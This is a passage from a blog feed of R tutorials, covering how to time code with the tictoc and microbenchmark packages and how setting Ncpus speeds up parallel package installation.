&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# end timer for second subsection&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;toc&lt;/span&gt;(log &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Half way til end: 2.005 sec elapsed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# end timer for entire section&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;toc&lt;/span&gt;(log &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## total time: 4.027 sec elapsed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can view the logged results as a list; &lt;code&gt;format = TRUE&lt;/code&gt; returns each entry as a nicely formatted string rather than the raw timing data.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tic.log&lt;/span&gt;(format &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## user system elapsed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 0.000 0.000 1.001&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We only want to take notice of the “elapsed” time, for the definition of the “user” and “system” times see &lt;a href="http://r.789695.n4.nabble.com/Meaning-of-proc-time-td2303263.html#a2306691" rel="external"&gt;this thread.&lt;/a&gt;&lt;/p&gt;
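&lt;p&gt;Returning to the {tictoc} log: here is a minimal sketch, assuming the log was filled by calls to &lt;code&gt;toc(log = TRUE)&lt;/code&gt;, of turning it into a named vector of elapsed times. The names &lt;code&gt;raw_log&lt;/code&gt; and &lt;code&gt;elapsed&lt;/code&gt; are ours, chosen purely for illustration, and &lt;code&gt;quiet = TRUE&lt;/code&gt; simply suppresses the printed message.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;tictoc&amp;#34;)
# start from an empty log
tic.clearlog()
for (i in 1:3) {
  tic(paste(&amp;#34;step&amp;#34;, i))
  Sys.sleep(0.1)
  # store the timing in the log without printing it
  toc(log = TRUE, quiet = TRUE)
}
# format = FALSE returns the raw entries, each with tic, toc and msg elements
raw_log = tic.log(format = FALSE)
elapsed = vapply(raw_log, function(x) unname(x$toc - x$tic), numeric(1))
names(elapsed) = vapply(raw_log, function(x) x$msg, character(1))
elapsed
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Having the timings as a plain numeric vector makes it easy to summarise or plot them later, and &lt;code&gt;tic.clearlog()&lt;/code&gt; resets the log when you are done.&lt;/p&gt;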
&lt;p&gt;For a repeated timing, we would use the &lt;code&gt;replicate()&lt;/code&gt; function.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;system.time&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;replicate&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.1&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## user system elapsed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 0.004 0.000 1.004&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2-the-microbenchmark-package"&gt;2) The microbenchmark package&lt;/h3&gt;
&lt;p&gt;You can install the &lt;code&gt;CRAN&lt;/code&gt; version of {microbenchmark} via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;microbenchmark&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Alternatively you can install the latest update via &lt;a href="https://github.com/olafmersmann/microbenchmark" rel="external"&gt;the {microbenchmark} GitHub page.&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;microbenchmark&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;At its most basic, &lt;code&gt;microbenchmark()&lt;/code&gt; can be used to time single pieces of code.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# times = 10: repeat the test 10 times&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# unit = &amp;#34;s&amp;#34;: output in seconds&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;microbenchmark&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.1&lt;/span&gt;), times &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, unit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;s&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Unit: seconds&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## expr min lq mean median uq max neval&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Sys.sleep(0.1) 0.1001 0.1002 0.1002 0.1002 0.1002 0.1002 10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Notice we get a nicely formatted table of summary statistics. We can record our times in anything from seconds to nanoseconds(!!!!). Already this is better than &lt;code&gt;system.time()&lt;/code&gt;. Not only that, but we can compare sections of code in an easy-to-do way and name the sections of code for an easy-to-read output.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sleep &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;microbenchmark&lt;/span&gt;(sleepy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.1&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sleepier &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.2&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sleepiest &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.3&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; times &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; unit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;s&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As well as this (more?!), {microbenchmark} comes with two built-in plotting functions.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;microbenchmark&lt;span style="color:#ff7b72;font-weight:bold"&gt;:::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;autoplot.microbenchmark&lt;/span&gt;(sleep)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="autoplot.png" style="width:450px; class:image-center"&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;microbenchmark&lt;span style="color:#ff7b72;font-weight:bold"&gt;:::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;boxplot.microbenchmark&lt;/span&gt;(sleep)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="boxplot.png" style="width:450px; class:image-center"&gt;
&lt;p&gt;These provide quick and efficient ways of visualising our timings.&lt;/p&gt;
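&lt;p&gt;The same timings can also be inspected numerically. The sketch below rebuilds a smaller version of the comparison (two expressions, five repetitions, to keep it quick) and uses &lt;code&gt;summary()&lt;/code&gt; to get the table of statistics as a data frame; the object name &lt;code&gt;timings&lt;/code&gt; is our own choice.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;microbenchmark&amp;#34;)
sleep = microbenchmark(sleepy = Sys.sleep(0.1),
                       sleepier = Sys.sleep(0.2),
                       times = 5)
# summary() returns a data frame with one row per expression
timings = summary(sleep, unit = &amp;#34;s&amp;#34;)
# keep just the expression name and its median time in seconds
timings[, c(&amp;#34;expr&amp;#34;, &amp;#34;median&amp;#34;)]
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Because the result is an ordinary data frame, it can be saved or compared between runs like any other data.&lt;/p&gt;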
&lt;h2 id="conclusion"&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;Sys.time()&lt;/code&gt; and &lt;code&gt;system.time()&lt;/code&gt; have their place, but for most cases we can do better. The {tictoc} and {microbenchmark} packages are particularly useful and make it easy to store timings for later use, and the range of options for both packages stretches far past the options for &lt;code&gt;Sys.time()&lt;/code&gt; and &lt;code&gt;system.time()&lt;/code&gt;. The built-in plotting functions are handy.&lt;/p&gt;
&lt;p&gt;Thanks for chatting!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/timing-in-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Speeding up package installation</title><link>https://www.jumpingrivers.com/blog/speeding-up-package-installation/</link><pubDate>Wed, 15 Nov 2017 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/speeding-up-package-installation/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/speeding-up-package-installation/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/speeding-up-package-installation/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="cant-be-bothered-reading-tell-me-now"&gt;Can’t be bothered reading, tell me now&lt;/h3&gt;
&lt;p&gt;A simple one line tweak can significantly speed up package installation and updates.&lt;/p&gt;
&lt;h3 id="the-wonder-of-cran"&gt;The wonder of CRAN&lt;/h3&gt;
&lt;p&gt;One of the best features of R is CRAN. When a package is submitted to CRAN, not only is it checked under three versions of R&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;R-past, R-release and R-devel&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;but also three different operating systems&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Windows, Linux and Mac (with multiple flavours of each)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;CRAN also checks that the updated package doesn’t break existing packages. This last part is particularly tricky when you consider all the dependencies a package like {ggplot2} or {Rcpp} has. Furthermore, it performs all these checks within 24 hours, ready for the next set of packages.&lt;/p&gt;
&lt;p&gt;What many people don’t realise is that for CRAN to perform this miracle of package checking, it builds and checks these packages in &lt;strong&gt;parallel&lt;/strong&gt;; so rather than installing a single package at a time, it checks multiple packages at once. Obviously some care has to be taken when checking/installing packages due to the connectivity between packages, but R takes care of these details.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2017-speeding-up-package-installation"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="parallel-package-installation-ncpus"&gt;Parallel package installation: Ncpus&lt;/h3&gt;
&lt;p&gt;If you examine the help page for &lt;code&gt;?install.packages&lt;/code&gt;, there’s a sneaky argument called &lt;code&gt;Ncpus&lt;/code&gt;. From the help page:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;Ncpus&lt;/code&gt;: The number of parallel processes to use for a parallel install of more than one source package.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The default value of this argument is&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;Ncpus = getOption(&amp;#34;Ncpus&amp;#34;, 1L)&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The &lt;code&gt;getOption()&lt;/code&gt; part determines if the value has been set in &lt;code&gt;options()&lt;/code&gt;. If no value is found, the default number of processes to use is &lt;code&gt;1&lt;/code&gt;. If you haven’t heard of &lt;code&gt;Ncpus&lt;/code&gt;, it’s almost certainly 1, but you can check using&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;getOption&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Ncpus&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1L&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="does-it-work"&gt;Does it work?&lt;/h3&gt;
&lt;p&gt;To test if changing the value of &lt;code&gt;Ncpus&lt;/code&gt; makes a difference, we’ll install the {tidyverse} package with all its associated dependencies. On my machine, all packages live in a directory called &lt;code&gt;/rpackages/&lt;/code&gt;. For each test below I deleted &lt;code&gt;/rpackages/&lt;/code&gt; so all {tidyverse} dependencies were reinstalled.&lt;/p&gt;
&lt;p&gt;My machine has eight cores&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;parallel&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;detectCores&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] 8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So it doesn’t make sense to set &lt;code&gt;Ncpus&lt;/code&gt; above 8. Another point is that although R reports that I have 8 cores, I only have 4 physical cores; the other 4 are due to hyper-threading. In practice, this means that I’m only likely to get at most a 6 fold speed-up.&lt;/p&gt;
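&lt;p&gt;To see the split between logical and physical cores on your own machine, &lt;code&gt;detectCores()&lt;/code&gt; has a &lt;code&gt;logical&lt;/code&gt; argument. This is only a small sketch: the help page notes that &lt;code&gt;logical = FALSE&lt;/code&gt; is not honoured on every platform, so the second number may be &lt;code&gt;NA&lt;/code&gt; or simply equal to the first. The variable names are ours.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# logical cores include those provided by hyper-threading
logical_cores = parallel::detectCores(logical = TRUE)
# physical cores, where the platform can report them
physical_cores = parallel::detectCores(logical = FALSE)
c(logical = logical_cores, physical = physical_cores)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;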
&lt;p&gt;For this experiment, I used the RStudio CRAN repository, set via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;options&lt;/span&gt;(repos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;CRAN&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://cran.rstudio.com/&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To time the installation procedure, I just use the standard &lt;code&gt;system.time()&lt;/code&gt; function.&lt;/p&gt;
&lt;p&gt;After removing the &lt;code&gt;/rpackages/&lt;/code&gt; directory, I set &lt;code&gt;Ncpus&lt;/code&gt; equal to &lt;code&gt;1&lt;/code&gt; and installed the {tidyverse} package with dependencies&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;options&lt;/span&gt;(Ncpus &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;system.time&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Time in seconds&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# user system elapsed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 372.252 15.468 409.364&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So a standard installation takes almost 7 minutes (409/60)!&lt;/p&gt;
&lt;p&gt;Before we go on, it’s worth noting a couple of caveats:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;This timing also includes the download time of the packages; however, for simplicity I’m ignoring this. Downloading the packages takes around 20 seconds.&lt;/li&gt;
&lt;li&gt;The above number uses a sample size of 1 to estimate the time; repeating the above experiment resulted in a remarkably consistent installation time of 410 seconds.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Repeating this experiment with different values of &lt;code&gt;Ncpus&lt;/code&gt; gives the table below:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Ncpus&lt;/th&gt;
&lt;th&gt;Elapsed (Secs)&lt;/th&gt;
&lt;th&gt;Ratio&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;409&lt;/td&gt;
&lt;td&gt;2.26&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;224&lt;/td&gt;
&lt;td&gt;1.24&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;196&lt;/td&gt;
&lt;td&gt;1.08&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;181&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;So setting &lt;code&gt;Ncpus&lt;/code&gt; to 2 allows us to roughly halve the installation time, from 409 seconds to around 224 seconds. Increasing &lt;code&gt;Ncpus&lt;/code&gt; to 4 gives a further speed boost. Due to the dependencies between packages, we’ll never achieve a perfect speed-up, e.g. if package {X} depends on {Y}, then we have to install {Y} first. However, for a simple change we get an easy speed boost.&lt;/p&gt;
&lt;p&gt;Furthermore, setting &lt;code&gt;Ncpus&lt;/code&gt; gives a speed boost when updating packages via &lt;code&gt;update.packages()&lt;/code&gt;.&lt;/p&gt;
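&lt;p&gt;The ratios in the table above can be reproduced with a little arithmetic. The sketch below uses the elapsed times from the table; the &lt;code&gt;speedup&lt;/code&gt; column is an extra we have added for illustration and is not part of the original table.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# elapsed times (in seconds) taken from the table above
timings = data.frame(Ncpus = c(1, 2, 4, 6),
                     elapsed = c(409, 224, 196, 181))
# Ratio column: elapsed time relative to the fastest run
timings$ratio = round(timings$elapsed / min(timings$elapsed), 2)
# speed-up relative to the single-process install
timings$speedup = round(timings$elapsed[1] / timings$elapsed, 2)
timings
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The speed-up column makes the diminishing returns explicit: most of the gain comes from the move from one process to two, and each additional process adds comparatively little.&lt;/p&gt;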
&lt;h3 id="a-permanent-change-rprofile"&gt;A permanent change: &lt;code&gt;.Rprofile&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;Clearly writing &lt;code&gt;options(Ncpus = 6)&lt;/code&gt; before you install a package is a pain. However, you can just add it to your &lt;code&gt;.Rprofile&lt;/code&gt; file. In a future blog post, we will cover the &lt;code&gt;.Rprofile&lt;/code&gt; in more detail, but for the purposes of this post, your &lt;code&gt;.Rprofile&lt;/code&gt; is a file that contains R code that runs whenever R starts. You can test whether you have an &lt;code&gt;.Rprofile&lt;/code&gt; file using the command&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;file.exists&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;~/.Rprofile&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you don’t have an &lt;code&gt;.Rprofile&lt;/code&gt; file, create one in your home area&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.getenv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;HOME&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then simply add &lt;code&gt;options(Ncpus = XX)&lt;/code&gt; to your file.&lt;/p&gt;
&lt;p&gt;The one remaining question is what value you should set &lt;code&gt;XX&lt;/code&gt; to. I typically set it to six since I have eight cores. This allows packages to be installed in parallel, while giving me a little bit of wiggle room to check email and listen to music.&lt;/p&gt;
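&lt;p&gt;As a rough sketch of that rule of thumb, the lines below could go in your &lt;code&gt;.Rprofile&lt;/code&gt;. Leaving two cores free is just the habit described above rather than a recommendation from the R documentation, and &lt;code&gt;n_cores&lt;/code&gt; is a name we made up for illustration.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# detectCores() can return NA on some platforms, so fall back to 1
n_cores = parallel::detectCores()
if (is.na(n_cores)) n_cores = 1L
# leave two cores free, but always use at least one process
options(Ncpus = max(1L, n_cores - 2L))
# confirm the value that install.packages() will now pick up
getOption(&amp;#34;Ncpus&amp;#34;)
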